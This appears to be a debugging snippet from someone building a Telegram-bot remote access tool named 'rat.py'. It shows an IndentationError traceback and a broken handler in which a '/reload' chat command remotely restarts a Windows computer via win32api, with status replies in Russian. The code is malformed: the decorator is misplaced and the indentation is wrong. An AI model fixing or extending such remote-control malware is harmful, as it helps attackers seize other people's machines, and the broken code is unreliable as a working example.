File "rat.py", line 226
if ("{0}".format(message.text) == "/reload"):
^
IndentationError: unexpected indent
# перезагрузить компьютер
def reload(message):
win32api.InitiateSystemShutdown()
@bot.message_handler(Commands=['reload', 'Reload'])
if ("{0}".format(message.text) == "/reload"):
try:
reload(message)
bot.send_message(chat_id, "Подождите...")
except:
bot.send_message(chat_id, "Ошибка!")